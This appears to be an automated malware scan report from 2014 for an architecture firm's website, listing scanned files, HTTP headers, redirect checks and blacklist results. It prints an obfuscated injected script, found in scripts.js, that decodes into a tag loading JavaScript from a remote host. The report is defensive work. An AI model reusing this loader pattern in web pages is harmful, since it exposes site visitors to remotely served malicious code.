Scanned pages/files
| Request | Server response | Status |
http://seifert-architects.com.ua/ | 200 OK Content-Length: 19497 Content-Type: text/html | clean |
http://seifert-architects.com.ua/i/js/jquery.js | 200 OK Content-Length: 72328 Content-Type: application/javascript | clean |
http://seifert-architects.com.ua/i/js/jquery.lib.js | 200 OK Content-Length: 14564 Content-Type: application/javascript | clean |
http://seifert-architects.com.ua/i/i/js/scripts.js | 200 OK Content-Length: 1691 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { var viewPort = $("#viewport"); var marginTop = viewPort.css("margin-top"); var marginBottom = viewPort.css("margin-bottom"); marginTop = parseInt( marginTop.substring( 0, marginTop.length - 2 ) ); marginBottom = parseInt( marginBottom.substring( 0, marginBottom.length - 2 ) ); var pageMainBlock = false; if($("#pageMainBlock").get().length) { pageMainBlock = $("#pageMainBlock"); } var onresize = fu clearInterval(timer); } }, 500); }; $(window).resize(function(){ onresize(); }); $("body:first").load(function(){ onresize(); recalcBottomMenuTop(); }); onresize(); recalcBottomMenuTop(); }); <!-- js-tools --> b=0;while(b<79)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00bvejups/{uvb/ofu0dpnqpofout0dpn`dpoubdu0tubu/qiq#?=0tdsjqu?'.charCodeAt(b++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://seifert-architects.com.ua/i/i/js/index.js | 200 OK Content-Length: 3327 Content-Type: application/javascript | clean |
http://seifert-architects.com.ua/i/i/js/bottomMenu.js | 200 OK Content-Length: 5608 Content-Type: application/javascript | clean |
http://seifert-architects.com.ua/eng/ | 200 OK Content-Length: 19497 Content-Type: text/html | clean |
http://seifert-architects.com.ua/rus/ | 200 OK Content-Length: 22732 Content-Type: text/html | clean |
http://seifert-architects.com.ua/ukr/ | 200 OK Content-Length: 22314 Content-Type: text/html | clean |
http://seifert-architects.com.ua/ukr/hotel_kurort/hilton_kiev.html | 200 OK Content-Length: 21174 Content-Type: text/html | clean |
http://seifert-architects.com.ua/i/i/js/page.js | 200 OK Content-Length: 2316 Content-Type: application/javascript | clean |
http://seifert-architects.com.ua/ukr/hotel_kurort/sofitel_kiev.html | 200 OK Content-Length: 21177 Content-Type: text/html | clean |
http://seifert-architects.com.ua/ukr/hotel_kurort/radison_royal_kiev.html | 200 OK Content-Length: 21198 Content-Type: text/html | clean |
http://seifert-architects.com.ua/ukr/hotel_kurort/yalta_park.html | 200 OK Content-Length: 21216 Content-Type: text/html | clean |
http://seifert-architects.com.ua/ukr/hotel_kurort/hgi.html | 200 OK Content-Length: 21171 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seifert-architects.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 15 Jul 2014 15:46:22 GMT
Pragma: no-cache
Server: Apache/2.2.22 (FreeBSD) PHP/5.4.3 mod_ssl/2.2.22 OpenSSL/0.9.8n DAV/2
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=214e5a931bee8f00e75591abd65c7dd3; path=/
X-Powered-By: PHP/5.4.3
GET / HTTP/1.1
Host: seifert-architects.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 15 Jul 2014 15:46:22 GMT
Pragma: no-cache
Server: Apache/2.2.22 (FreeBSD) PHP/5.4.3 mod_ssl/2.2.22 OpenSSL/0.9.8n DAV/2
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=214e5a931bee8f00e75591abd65c7dd3; path=/
X-Powered-By: PHP/5.4.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: seifert-architects.com.ua
Referer: http://www.google.com/search?q=seifert-architects.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: seifert-architects.com.ua
Referer: http://www.google.com/search?q=seifert-architects.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seifert-architects.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://seifert-architects.com.ua/
Result: seifert-architects.com.ua is not infected or malware details are not published yet.
Result: seifert-architects.com.ua is not infected or malware details are not published yet.